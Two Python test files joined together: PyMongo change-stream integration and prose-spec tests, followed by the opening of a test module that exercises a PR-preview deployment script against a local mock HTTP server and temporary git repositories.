expected_update_description['truncatedArrays'] = []
self.assertEqual(expected_update_description,
change['updateDescription'])
# Replace.
self.watched_collection().replace_one({'new': 1}, {'foo': 'bar'})
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'replace')
self.assertEqual(change['ns'], expected_ns)
self.assertEqual(change['fullDocument'], inserted_doc)
# Delete.
self.watched_collection().delete_one({'foo': 'bar'})
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'delete')
self.assertEqual(change['ns'], expected_ns)
self.assertNotIn('fullDocument', change)
# Invalidate.
self._test_get_invalidate_event(change_stream)
@client_context.require_version_min(4, 1, 1)
def test_start_after(self):
resume_token = self.get_resume_token(invalidate=True)
# resume_after cannot resume after invalidate.
with self.assertRaises(OperationFailure):
self.change_stream(resume_after=resume_token)
# start_after can resume after invalidate.
with self.change_stream(start_after=resume_token) as change_stream:
self.watched_collection().insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
@client_context.require_version_min(4, 1, 1)
def test_start_after_resume_process_with_changes(self):
resume_token = self.get_resume_token(invalidate=True)
with self.change_stream(start_after=resume_token,
max_await_time_ms=250) as change_stream:
self.watched_collection().insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
self.assertIsNone(change_stream.try_next())
self.kill_change_stream_cursor(change_stream)
self.watched_collection().insert_one({'_id': 3})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 3})
@client_context.require_no_mongos # Remove after SERVER-41196
@client_context.require_version_min(4, 1, 1)
def test_start_after_resume_process_without_changes(self):
resume_token = self.get_resume_token(invalidate=True)
with self.change_stream(start_after=resume_token,
max_await_time_ms=250) as change_stream:
self.assertIsNone(change_stream.try_next())
self.kill_change_stream_cursor(change_stream)
self.watched_collection().insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
class ProseSpecTestsMixin(object):
def _client_with_listener(self, *commands):
listener = AllowListEventListener(*commands)
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
return client, listener
def _populate_and_exhaust_change_stream(self, change_stream, batch_size=3):
self.watched_collection().insert_many(
[{"data": k} for k in range(batch_size)])
for _ in range(batch_size):
change = next(change_stream)
return change
def _get_expected_resume_token_legacy(self, stream,
listener, previous_change=None):
"""Predicts what the resume token should currently be for server
versions that don't support postBatchResumeToken. Assumes the stream
has never returned any changes if previous_change is None."""
if previous_change is None:
agg_cmd = listener.results['started'][0]
stage = agg_cmd.command["pipeline"][0]["$changeStream"]
return stage.get("resumeAfter") or stage.get("startAfter")
return previous_change['_id']
def _get_expected_resume_token(self, stream, listener,
previous_change=None):
"""Predicts what the resume token should currently be for server
versions that support postBatchResumeToken. Assumes the stream has
never returned any changes if previous_change is None. Assumes
listener is a AllowListEventListener that listens for aggregate and
getMore commands."""
if previous_change is None or stream._cursor._has_next():
token = self._get_expected_resume_token_legacy(
stream, listener, previous_change)
if token is not None:
return token
response = listener.results['succeeded'][-1].reply
return response['cursor']['postBatchResumeToken']
def _test_raises_error_on_missing_id(self, expected_exception):
"""ChangeStream will raise an exception if the server response is
missing the resume token.
"""
with self.change_stream([{'$project': {'_id': 0}}]) as change_stream:
self.watched_collection().insert_one({})
with self.assertRaises(expected_exception):
next(change_stream)
# The cursor should now be closed.
with self.assertRaises(StopIteration):
next(change_stream)
def _test_update_resume_token(self, expected_rt_getter):
"""ChangeStream must continuously track the last seen resumeToken."""
client, listener = self._client_with_listener("aggregate", "getMore")
coll = self.watched_collection(write_concern=WriteConcern('majority'))
with self.change_stream_with_client(client) as change_stream:
self.assertEqual(
change_stream.resume_token,
expected_rt_getter(change_stream, listener))
for _ in range(3):
coll.insert_one({})
change = next(change_stream)
self.assertEqual(
change_stream.resume_token,
expected_rt_getter(change_stream, listener, change))
# Prose test no. 1
@client_context.require_version_min(4, 0, 7)
def test_update_resume_token(self):
self._test_update_resume_token(self._get_expected_resume_token)
# Prose test no. 1
@client_context.require_version_max(4, 0, 7)
def test_update_resume_token_legacy(self):
self._test_update_resume_token(self._get_expected_resume_token_legacy)
# Prose test no. 2
@client_context.require_version_max(4, 3, 3) # PYTHON-2120
@client_context.require_version_min(4, 1, 8)
def test_raises_error_on_missing_id_418plus(self):
# Server returns an error on 4.1.8+
self._test_raises_error_on_missing_id(OperationFailure)
# Prose test no. 2
@client_context.require_version_max(4, 1, 8)
def test_raises_error_on_missing_id_418minus(self):
# PyMongo raises an error
self._test_raises_error_on_missing_id(InvalidOperation)
# Prose test no. 3
def test_resume_on_error(self):
with self.change_stream() as change_stream:
self.insert_one_and_check(change_stream, {'_id': 1})
# Cause a cursor not found error on the next getMore.
self.kill_change_stream_cursor(change_stream)
self.insert_one_and_check(change_stream, {'_id': 2})
# Prose test no. 4
@client_context.require_failCommand_fail_point
def test_no_resume_attempt_if_aggregate_command_fails(self):
# Set non-retryable error on aggregate command.
fail_point = {'mode': {'times': 1},
'data': {'errorCode': 2, 'failCommands': ['aggregate']}}
client, listener = self._client_with_listener("aggregate", "getMore")
with self.fail_point(fail_point):
try:
_ = self.change_stream_with_client(client)
except OperationFailure:
pass
# Driver should have attempted aggregate command only once.
self.assertEqual(len(listener.results['started']), 1)
self.assertEqual(listener.results['started'][0].command_name,
'aggregate')
# Prose test no. 5 - REMOVED
# Prose test no. 6 - SKIPPED
# Reason: readPreference is not configurable using the watch() helpers
# so we can skip this test. Also, PyMongo performs server selection for
# each operation which ensure compliance with this prose test.
# Prose test no. 7
def test_initial_empty_batch(self):
with self.change_stream() as change_stream:
# The first batch should be empty.
self.assertFalse(change_stream._cursor._has_next())
cursor_id = change_stream._cursor.cursor_id
self.assertTrue(cursor_id)
self.insert_one_and_check(change_stream, {})
# Make sure we're still using the same cursor.
self.assertEqual(cursor_id, change_stream._cursor.cursor_id)
# Prose test no. 8
def test_kill_cursors(self):
def raise_error():
raise ServerSelectionTimeoutError('mock error')
with self.change_stream() as change_stream:
self.insert_one_and_check(change_stream, {'_id': 1})
# Cause a cursor not found error on the next getMore.
cursor = change_stream._cursor
self.kill_change_stream_cursor(change_stream)
cursor.close = raise_error
self.insert_one_and_check(change_stream, {'_id': 2})
# Prose test no. 9
@client_context.require_version_min(4, 0, 0)
@client_context.require_version_max(4, 0, 7)
def test_start_at_operation_time_caching(self):
# Case 1: change stream not started with startAtOperationTime
client, listener = self.client_with_listener("aggregate")
with self.change_stream_with_client(client) as cs:
self.kill_change_stream_cursor(cs)
cs.try_next()
cmd = listener.results['started'][-1].command
self.assertIsNotNone(cmd["pipeline"][0]["$changeStream"].get(
"startAtOperationTime"))
# Case 2: change stream started with startAtOperationTime
listener.results.clear()
optime = self.get_start_at_operation_time()
with self.change_stream_with_client(
client, start_at_operation_time=optime) as cs:
self.kill_change_stream_cursor(cs)
cs.try_next()
cmd = listener.results['started'][-1].command
self.assertEqual(cmd["pipeline"][0]["$changeStream"].get(
"startAtOperationTime"), optime, str([k.command for k in
listener.results['started']]))
# Prose test no. 10 - SKIPPED
# This test is identical to prose test no. 3.
# Prose test no. 11
@client_context.require_version_min(4, 0, 7)
def test_resumetoken_empty_batch(self):
client, listener = self._client_with_listener("getMore")
with self.change_stream_with_client(client) as change_stream:
self.assertIsNone(change_stream.try_next())
resume_token = change_stream.resume_token
response = listener.results['succeeded'][0].reply
self.assertEqual(resume_token,
response["cursor"]["postBatchResumeToken"])
# Prose test no. 11
@client_context.require_version_min(4, 0, 7)
def test_resumetoken_exhausted_batch(self):
client, listener = self._client_with_listener("getMore")
with self.change_stream_with_client(client) as change_stream:
self._populate_and_exhaust_change_stream(change_stream)
resume_token = change_stream.resume_token
response = listener.results['succeeded'][-1].reply
self.assertEqual(resume_token,
response["cursor"]["postBatchResumeToken"])
# Prose test no. 12
@client_context.require_version_max(4, 0, 7)
def test_resumetoken_empty_batch_legacy(self):
resume_point = self.get_resume_token()
# Empty resume token when neither resumeAfter or startAfter specified.
with self.change_stream() as change_stream:
change_stream.try_next()
self.assertIsNone(change_stream.resume_token)
# Resume token value is same as resumeAfter.
with self.change_stream(resume_after=resume_point) as change_stream:
change_stream.try_next()
resume_token = change_stream.resume_token
self.assertEqual(resume_token, resume_point)
# Prose test no. 12
@client_context.require_version_max(4, 0, 7)
def test_resumetoken_exhausted_batch_legacy(self):
# Resume token is _id of last change.
with self.change_stream() as change_stream:
change = self._populate_and_exhaust_change_stream(change_stream)
self.assertEqual(change_stream.resume_token, change["_id"])
resume_point = change['_id']
# Resume token is _id of last change even if resumeAfter is specified.
with self.change_stream(resume_after=resume_point) as change_stream:
change = self._populate_and_exhaust_change_stream(change_stream)
self.assertEqual(change_stream.resume_token, change["_id"])
# Prose test no. 13
def test_resumetoken_partially_iterated_batch(self):
# When batch has been iterated up to but not including the last element.
# Resume token should be _id of previous change document.
with self.change_stream() as change_stream:
self.watched_collection(
write_concern=WriteConcern('majority')).insert_many(
[{"data": k} for k in range(3)])
for _ in range(2):
change = next(change_stream)
resume_token = change_stream.resume_token
self.assertEqual(resume_token, change["_id"])
def _test_resumetoken_uniterated_nonempty_batch(self, resume_option):
# When the batch is not empty and hasn't been iterated at all.
# Resume token should be same as the resume option used.
resume_point = self.get_resume_token()
# Insert some documents so that firstBatch isn't empty.
self.watched_collection(
write_concern=WriteConcern("majority")).insert_many(
[{'a': 1}, {'b': 2}, {'c': 3}])
# Resume token should be same as the resume option.
with self.change_stream(
**{resume_option: resume_point}) as change_stream:
self.assertTrue(change_stream._cursor._has_next())
resume_token = change_stream.resume_token
self.assertEqual(resume_token, resume_point)
# Prose test no. 14
@client_context.require_no_mongos
def test_resumetoken_uniterated_nonempty_batch_resumeafter(self):
self._test_resumetoken_uniterated_nonempty_batch("resume_after")
# Prose test no. 14
@client_context.require_no_mongos
@client_context.require_version_min(4, 1, 1)
def test_resumetoken_uniterated_nonempty_batch_startafter(self):
self._test_resumetoken_uniterated_nonempty_batch("start_after")
# Prose test no. 17
@client_context.require_version_min(4, 1, 1)
def test_startafter_resume_uses_startafter_after_empty_getMore(self):
# Resume should use startAfter after no changes have been returned.
resume_point = self.get_resume_token()
client, listener = self._client_with_listener("aggregate")
with self.change_stream_with_client(
client, start_after=resume_point) as change_stream:
self.assertFalse(change_stream._cursor._has_next()) # No changes
change_stream.try_next() # No changes
self.kill_change_stream_cursor(change_stream)
change_stream.try_next() # Resume attempt
response = listener.results['started'][-1]
self.assertIsNone(
response.command["pipeline"][0]["$changeStream"].get("resumeAfter"))
self.assertIsNotNone(
response.command["pipeline"][0]["$changeStream"].get("startAfter"))
# Prose test no. 18
@client_context.require_version_min(4, 1, 1)
def test_startafter_resume_uses_resumeafter_after_nonempty_getMore(self):
# Resume should use resumeAfter after some changes have been returned.
resume_point = self.get_resume_token()
client, listener = self._client_with_listener("aggregate")
with self.change_stream_with_client(
client, start_after=resume_point) as change_stream:
self.assertFalse(change_stream._cursor._has_next()) # No changes
self.watched_collection().insert_one({})
next(change_stream) # Changes
self.kill_change_stream_cursor(change_stream)
change_stream.try_next() # Resume attempt
response = listener.results['started'][-1]
self.assertIsNotNone(
response.command["pipeline"][0]["$changeStream"].get("resumeAfter"))
self.assertIsNone(
response.command["pipeline"][0]["$changeStream"].get("startAfter"))
class TestClusterChangeStream(TestChangeStreamBase, APITestsMixin):
@classmethod
@client_context.require_version_min(4, 0, 0, -1)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestClusterChangeStream, cls).setUpClass()
cls.dbs = [cls.db, cls.client.pymongo_test_2]
@classmethod
def tearDownClass(cls):
for db in cls.dbs:
cls.client.drop_database(db)
super(TestClusterChangeStream, cls).tearDownClass()
def change_stream_with_client(self, client, *args, **kwargs):
return client.watch(*args, **kwargs)
def generate_invalidate_event(self, change_stream):
self.skipTest("cluster-level change streams cannot be invalidated")
def _test_get_invalidate_event(self, change_stream):
# Cluster-level change streams don't get invalidated.
pass
def _test_invalidate_stops_iteration(self, change_stream):
# Cluster-level change streams don't get invalidated.
pass
def _insert_and_check(self, change_stream, db, collname, doc):
coll = db[collname]
coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': db.name,
'coll': collname})
self.assertEqual(change['fullDocument'], doc)
def insert_one_and_check(self, change_stream, doc):
db = random.choice(self.dbs)
collname = self.id()
self._insert_and_check(change_stream, db, collname, doc)
def test_simple(self):
collnames = self.generate_unique_collnames(3)
with self.change_stream() as change_stream:
for db, collname in product(self.dbs, collnames):
self._insert_and_check(
change_stream, db, collname, {'_id': collname}
)
def test_aggregate_cursor_blocks(self):
"""Test that an aggregate cursor blocks until a change is readable."""
with self.client.admin.aggregate(
[{'$changeStream': {'allChangesForCluster': True}}],
maxAwaitTimeMS=250) as change_stream:
self._test_next_blocks(change_stream)
def test_full_pipeline(self):
"""$changeStream must be the first stage in a change stream pipeline
sent to the server.
"""
self._test_full_pipeline({'allChangesForCluster': True})
class TestDatabaseChangeStream(TestChangeStreamBase, APITestsMixin):
@classmethod
@client_context.require_version_min(4, 0, 0, -1)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestDatabaseChangeStream, cls).setUpClass()
def change_stream_with_client(self, client, *args, **kwargs):
return client[self.db.name].watch(*args, **kwargs)
def generate_invalidate_event(self, change_stream):
# Dropping the database invalidates the change stream.
change_stream._client.drop_database(self.db.name)
def _test_get_invalidate_event(self, change_stream):
# Cache collection names.
dropped_colls = self.db.list_collection_names()
# Drop the watched database to get an invalidate event.
self.generate_invalidate_event(change_stream)
change = change_stream.next()
# 4.1+ returns "drop" events for each collection in dropped database
# and a "dropDatabase" event for the database itself.
if change['operationType'] == 'drop':
self.assertTrue(change['_id'])
for _ in range(len(dropped_colls)):
ns = change['ns']
self.assertEqual(ns['db'], change_stream._target.name)
self.assertIn(ns['coll'], dropped_colls)
change = change_stream.next()
self.assertEqual(change['operationType'], 'dropDatabase')
self.assertTrue(change['_id'])
self.assertEqual(change['ns'], {'db': change_stream._target.name})
# Get next change.
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'invalidate')
self.assertNotIn('ns', change)
self.assertNotIn('fullDocument', change)
# The ChangeStream should be dead.
with self.assertRaises(StopIteration):
change_stream.next()
def _test_invalidate_stops_iteration(self, change_stream):
# Drop the watched database to get an invalidate event.
change_stream._client.drop_database(self.db.name)
# Check drop and dropDatabase events.
for change in change_stream:
self.assertIn(change['operationType'], (
'drop', 'dropDatabase', 'invalidate'))
# Last change must be invalidate.
self.assertEqual(change['operationType'], 'invalidate')
# Change stream must not allow further iteration.
with self.assertRaises(StopIteration):
change_stream.next()
with self.assertRaises(StopIteration):
next(change_stream)
def _insert_and_check(self, change_stream, collname, doc):
coll = self.db[collname]
coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': self.db.name,
'coll': collname})
self.assertEqual(change['fullDocument'], doc)
def insert_one_and_check(self, change_stream, doc):
self._insert_and_check(change_stream, self.id(), doc)
def test_simple(self):
collnames = self.generate_unique_collnames(3)
with self.change_stream() as change_stream:
for collname in collnames:
self._insert_and_check(
change_stream, collname,
{'_id': Binary.from_uuid(uuid.uuid4())})
def test_isolation(self):
# Ensure inserts to other dbs don't show up in our ChangeStream.
other_db = self.client.pymongo_test_temp
self.assertNotEqual(
other_db, self.db, msg="Isolation must be tested on separate DBs")
collname = self.id()
with self.change_stream() as change_stream:
other_db[collname].insert_one(
{'_id': Binary.from_uuid(uuid.uuid4())})
self._insert_and_check(
change_stream, collname,
{'_id': Binary.from_uuid(uuid.uuid4())})
self.client.drop_database(other_db)
class TestCollectionChangeStream(TestChangeStreamBase, APITestsMixin,
ProseSpecTestsMixin):
@classmethod
@client_context.require_version_min(3, 5, 11)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestCollectionChangeStream, cls).setUpClass()
def setUp(self):
# Use a new collection for each test.
self.watched_collection().drop()
self.watched_collection().insert_one({})
def change_stream_with_client(self, client, *args, **kwargs):
return client[self.db.name].get_collection(
self.watched_collection().name).watch(*args, **kwargs)
def generate_invalidate_event(self, change_stream):
# Dropping the collection invalidates the change stream.
change_stream._target.drop()
def _test_invalidate_stops_iteration(self, change_stream):
self.generate_invalidate_event(change_stream)
# Check drop and dropDatabase events.
for change in change_stream:
self.assertIn(change['operationType'], ('drop', 'invalidate'))
# Last change must be invalidate.
self.assertEqual(change['operationType'], 'invalidate')
# Change stream must not allow further iteration.
with self.assertRaises(StopIteration):
change_stream.next()
with self.assertRaises(StopIteration):
next(change_stream)
def _test_get_invalidate_event(self, change_stream):
# Drop the watched database to get an invalidate event.
change_stream._target.drop()
change = change_stream.next()
# 4.1+ returns a "drop" change document.
if change['operationType'] == 'drop':
self.assertTrue(change['_id'])
self.assertEqual(change['ns'], {
'db': change_stream._target.database.name,
'coll': change_stream._target.name})
# Last change should be invalidate.
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'invalidate')
self.assertNotIn('ns', change)
self.assertNotIn('fullDocument', change)
# The ChangeStream should be dead.
with self.assertRaises(StopIteration):
change_stream.next()
def insert_one_and_check(self, change_stream, doc):
self.watched_collection().insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(
change['ns'], {'db': self.watched_collection().database.name,
'coll': self.watched_collection().name})
self.assertEqual(change['fullDocument'], doc)
def test_raw(self):
"""Test with RawBSONDocument."""
raw_coll = self.watched_collection(
codec_options=DEFAULT_RAW_BSON_OPTIONS)
with raw_coll.watch() as change_stream:
raw_doc = RawBSONDocument(encode({'_id': 1}))
self.watched_collection().insert_one(raw_doc)
change = next(change_stream)
self.assertIsInstance(change, RawBSONDocument)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(
change['ns']['db'], self.watched_collection().database.name)
self.assertEqual(
change['ns']['coll'], self.watched_collection().name)
self.assertEqual(change['fullDocument'], raw_doc)
def test_uuid_representations(self):
"""Test with uuid document _ids and different uuid_representation."""
for uuid_representation in ALL_UUID_REPRESENTATIONS:
for id_subtype in (STANDARD, PYTHON_LEGACY):
options = self.watched_collection().codec_options.with_options(
uuid_representation=uuid_representation)
coll = self.watched_collection(codec_options=options)
with coll.watch() as change_stream:
coll.insert_one(
{'_id': Binary(uuid.uuid4().bytes, id_subtype)})
_ = change_stream.next()
resume_token = change_stream.resume_token
# Should not error.
coll.watch(resume_after=resume_token)
def test_document_id_order(self):
"""Test with document _ids that need their order preserved."""
random_keys = random.sample(string.ascii_letters,
len(string.ascii_letters))
random_doc = {'_id': SON([(key, key) for key in random_keys])}
for document_class in (dict, SON, RawBSONDocument):
options = self.watched_collection().codec_options.with_options(
document_class=document_class)
coll = self.watched_collection(codec_options=options)
with coll.watch() as change_stream:
coll.insert_one(random_doc)
_ = change_stream.next()
resume_token = change_stream.resume_token
# The resume token is always a document.
self.assertIsInstance(resume_token, document_class)
# Should not error.
coll.watch(resume_after=resume_token)
coll.delete_many({})
def test_read_concern(self):
"""Test readConcern is not validated by the driver."""
# Read concern 'local' is not allowed for $changeStream.
coll = self.watched_collection(read_concern=ReadConcern('local'))
with self.assertRaises(OperationFailure):
coll.watch()
# Does not error.
coll = self.watched_collection(read_concern=ReadConcern('majority'))
with coll.watch():
pass
class TestAllLegacyScenarios(IntegrationTest):
RUN_ON_LOAD_BALANCER = True
@classmethod
@client_context.require_connection
def setUpClass(cls):
super(TestAllLegacyScenarios, cls).setUpClass()
cls.listener = AllowListEventListener("aggregate", "getMore")
cls.client = rs_or_single_client(event_listeners=[cls.listener])
@classmethod
def tearDownClass(cls):
cls.client.close()
super(TestAllLegacyScenarios, cls).tearDownClass()
def setUp(self):
super(TestAllLegacyScenarios, self).setUp()
self.listener.results.clear()
def setUpCluster(self, scenario_dict):
assets = [(scenario_dict["database_name"],
scenario_dict["collection_name"]),
(scenario_dict.get("database2_name", "db2"),
scenario_dict.get("collection2_name", "coll2"))]
for db, coll in assets:
self.client.drop_database(db)
self.client[db].create_collection(coll)
def setFailPoint(self, scenario_dict):
fail_point = scenario_dict.get("failPoint")
if fail_point is None:
return
elif not client_context.test_commands_enabled:
self.skipTest("Test commands must be enabled")
fail_cmd = SON([('configureFailPoint', 'failCommand')])
fail_cmd.update(fail_point)
client_context.client.admin.command(fail_cmd)
self.addCleanup(
client_context.client.admin.command,
'configureFailPoint', fail_cmd['configureFailPoint'], mode='off')
def assert_list_contents_are_subset(self, superlist, sublist):
"""Check that each element in sublist is a subset of the corresponding
element in superlist."""
self.assertEqual(len(superlist), len(sublist))
for sup, sub in zip(superlist, sublist):
if isinstance(sub, dict):
self.assert_dict_is_subset(sup, sub)
continue
if isinstance(sub, (list, tuple)):
self.assert_list_contents_are_subset(sup, sub)
continue
self.assertEqual(sup, sub)
def assert_dict_is_subset(self, superdict, subdict):
"""Check that subdict is a subset of superdict."""
exempt_fields = ["documentKey", "_id", "getMore"]
for key, value in subdict.items():
if key not in superdict:
self.fail('Key %s not found in %s' % (key, superdict))
if isinstance(value, dict):
self.assert_dict_is_subset(superdict[key], value)
continue
if isinstance(value, (list, tuple)):
self.assert_list_contents_are_subset(superdict[key], value)
continue
if key in exempt_fields:
# Only check for presence of these exempt fields, but not value.
self.assertIn(key, superdict)
else:
self.assertEqual(superdict[key], value)
def check_event(self, event, expectation_dict):
if event is None:
self.fail()
for key, value in expectation_dict.items():
if isinstance(value, dict):
self.assert_dict_is_subset(getattr(event, key), value)
else:
self.assertEqual(getattr(event, key), value)
def tearDown(self):
self.listener.results.clear()
_TEST_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'change_streams')
def camel_to_snake(camel):
# Regex to convert CamelCase to snake_case.
snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower()
def get_change_stream(client, scenario_def, test):
# Get target namespace on which to instantiate change stream
target = test["target"]
if target == "collection":
db = client.get_database(scenario_def["database_name"])
cs_target = db.get_collection(scenario_def["collection_name"])
elif target == "database":
cs_target = client.get_database(scenario_def["database_name"])
elif target == "client":
cs_target = client
else:
raise ValueError("Invalid target in spec")
# Construct change stream kwargs dict
cs_pipeline = test["changeStreamPipeline"]
options = test["changeStreamOptions"]
cs_options = {}
for key, value in options.items():
cs_options[camel_to_snake(key)] = value
# Create and return change stream
return cs_target.watch(pipeline=cs_pipeline, **cs_options)
def run_operation(client, operation):
# Apply specified operations
opname = camel_to_snake(operation["name"])
arguments = operation.get("arguments", {})
if opname == 'rename':
# Special case for rename operation.
arguments = {'new_name': arguments["to"]}
cmd = getattr(client.get_database(
operation["database"]).get_collection(
operation["collection"]), opname
)
return cmd(**arguments)
def create_test(scenario_def, test):
def run_scenario(self):
# Set up
self.setUpCluster(scenario_def)
self.setFailPoint(test)
is_error = test["result"].get("error", False)
try:
with get_change_stream(
self.client, scenario_def, test
) as change_stream:
for operation in test["operations"]:
# Run specified operations
run_operation(self.client, operation)
num_expected_changes = len(test["result"].get("success", []))
changes = [
change_stream.next() for _ in range(num_expected_changes)]
# Run a next() to induce an error if one is expected and
# there are no changes.
if is_error and not changes:
change_stream.next()
except OperationFailure as exc:
if not is_error:
raise
expected_code = test["result"]["error"]["code"]
self.assertEqual(exc.code, expected_code)
else:
# Check for expected output from change streams
if test["result"].get("success"):
for change, expected_changes in zip(changes, test["result"]["success"]):
self.assert_dict_is_subset(change, expected_changes)
self.assertEqual(len(changes), len(test["result"]["success"]))
finally:
# Check for expected events
results = self.listener.results
# Note: expectations may be missing, null, or a list of events.
# Extra events emitted by the test are intentionally ignored.
for idx, expectation in enumerate(test.get("expectations") or []):
for event_type, event_desc in expectation.items():
results_key = event_type.split("_")[1]
event = results[results_key][idx] if len(results[results_key]) > idx else None
self.check_event(event, event_desc)
return run_scenario
def create_tests():
for dirpath, _, filenames in os.walk(os.path.join(_TEST_PATH, 'legacy')):
dirname = os.path.split(dirpath)[-1]
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
scenario_def = json_util.loads(scenario_stream.read())
test_type = os.path.splitext(filename)[0]
for test in scenario_def['tests']:
new_test = create_test(scenario_def, test)
new_test = client_context.require_no_mmap(new_test)
if 'minServerVersion' in test:
min_ver = tuple(
int(elt) for
elt in test['minServerVersion'].split('.'))
new_test = client_context.require_version_min(*min_ver)(
new_test)
if 'maxServerVersion' in test:
max_ver = tuple(
int(elt) for
elt in test['maxServerVersion'].split('.'))
new_test = client_context.require_version_max(*max_ver)(
new_test)
topologies = test['topology']
new_test = client_context.require_cluster_type(topologies)(
new_test)
test_name = 'test_%s_%s_%s' % (
dirname,
test_type.replace("-", "_"),
str(test['description'].replace(" ", "_")))
new_test.__name__ = test_name
setattr(TestAllLegacyScenarios, new_test.__name__, new_test)
create_tests()
globals().update(generate_test_classes(
os.path.join(_TEST_PATH, 'unified'),
module=__name__,))
if __name__ == '__main__':
unittest.main()
|
test_pr_preview.py
|
try:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 3 case
from http.server import BaseHTTPRequestHandler, HTTPServer
import contextlib
import errno
import json
import os
import shutil
import stat
import subprocess
import tempfile
import threading
subject = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', 'pr_preview.py'
)
test_host = 'localhost'
def same_members(a, b):
if len(a) != len(b):
return False
a_copy = list(a)
for elem in b:
try:
a_copy.remove(elem)
except ValueError:
return False
return len(a_copy) == 0
# When these tests are executed in Windows, files in the temporary git
# repositories may be marked as "read only" at the moment they are intended to
# be deleted. The following handler for `shutil.rmtree` accounts for this by
# making the files writable and attempting to delete them a second time.
#
# Source:
# https://stackoverflow.com/questions/1213706/what-user-do-python-scripts-run-as-in-windows
def handle_remove_readonly(func, path, exc):
excvalue = exc[1]
candidates = (os.rmdir, os.remove, os.unlink)
if func in candidates and excvalue.errno == errno.EACCES:
os.chmod(path, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO) # 0777
func(path)
else:
raise
class MockHandler(BaseHTTPRequestHandler, object):
def do_all(self):
path = self.path.split('?')[0]
request_body = None
if 'Content-Length' in self.headers:
request_body = self.rfile.read(
int(self.headers['Content-Length'])
).decode('utf-8')
if self.headers.get('Content-Type') == 'application/json':
request_body = json.loads(request_body)
for request, response in self.server.expected_traffic:
if request[0] != self.command:
continue
if request[1] != path:
continue
body_matches = True
for key in request[2]:
body_matches &= request[2][key] == request_body.get(key)
if not body_matches:
continue
break
else:
request = (self.command, path, request_body)
response = (400, {})
self.server.actual_traffic.append((request, response))
self.send_response(response[0])
self.end_headers()
self.wfile.write(json.dumps(response[1]).encode('utf-8'))
def do_DELETE(self):
return self.do_all()
def do_GET(self):
return self.do_all()
def do_PATCH(self):
return self.do_all()
def do_POST(self):
return self.do_all()
class MockServer(HTTPServer, object):
'''HTTP server that responds to all requests with status code 200 and body
'{}' unless an alternative status code and body are specified for the given
method and path in the `responses` parameter.'''
def __init__(self, address, expected_traffic):
super(MockServer, self).__init__(address, MockHandler)
self.expected_traffic = expected_traffic
self.actual_traffic = []
def __enter__(self):
threading.Thread(target=lambda: self.serve_forever()).start()
return self
def __exit__(self, *args):
self.shutdown()
class Requests(object):
get_rate = ('GET', '/rate_limit', {})
search = ('GET', '/search/issues', {})
ref_create_open = (
'POST', '/repos/test-org/test-repo/git/refs', {'ref':'refs/prs-open/23'}
)
ref_create_trusted = (
'POST',
'/repos/test-org/test-repo/git/refs',
{'ref':'refs/prs-trusted-for-preview/23'}
)
ref_update_open = (
'PATCH', '/repos/test-org/test-repo/git/refs/prs-open/23', {}
)
ref_update_trusted = (
'PATCH', '/repos/test-org/test-repo/git/refs/prs-trusted-for-preview/23', {}
)
deployment_get = ('GET', '/repos/test-org/test-repo/deployments', {})
deployment_create = ('POST', '/repos/test-org/test-repo/deployments', {})
deployment_status_create_pending = (
'POST',
'/repos/test-org/test-repo/deployments/24601/statuses',
{'state':'pending'}
)
deployment_status_create_error = (
'POST',
'/repos/test-org/test-repo/deployments/24601/statuses',
{'state':'error'}
)
deployment_status_create_success = (
'POST',
'/repos/test-org/test-repo/deployments/24601/statuses',
{'state':'success'}
)
preview = ('GET', '/.git/worktrees/45/HEAD', {})
class Responses(object):
no_limit = (200, {
'resources': {
'search': {
'remaining': 100,
'limit': 100
},
'core': {
'remaining': 100,
'limit': 100
}
}
})
@contextlib.contextmanager
def temp_repo():
directory = tempfile.mkdtemp()
try:
subprocess.check_call(['git', 'init'], cwd=directory)
subprocess.check_call(
['git', 'config', 'user.name', 'example'],
cwd=directory
)
subprocess.check_call(
['git', 'config', 'user.email', 'example@example.com'],
cwd=directory
)
subprocess.check_call(
['git', 'commit', '--allow-empty', '-m', 'first'],
cwd=directory
)
yield directory
finally:
shutil.rmtree(
directory, ignore_errors=False, onerror=handle_remove_readonly
)
def synchronize(expected_traffic, refs={}):
env = {
'DEPLOY_TOKEN': 'c0ffee'
}
env.update(os.environ)
server = MockServer((test_host, 0), expected_traffic)
test_port = server.server_address[1]
remote_refs = {}
with temp_repo() as local_repo, temp_repo() as remote_repo, server:
subprocess.check_call(
['git', 'commit', '--allow-empty', '-m', 'first'],
cwd=remote_repo
)
subprocess.check_call(
['git', 'commit', '--allow-empty', '-m', 'second'],
cwd=remote_repo
)
subprocess.check_call(
['git', 'remote', 'add', 'origin', remote_repo], cwd=local_repo
)
for name, value in refs.items():
subprocess.check_call(
['git', 'update-ref', name, value],
cwd=remote_repo
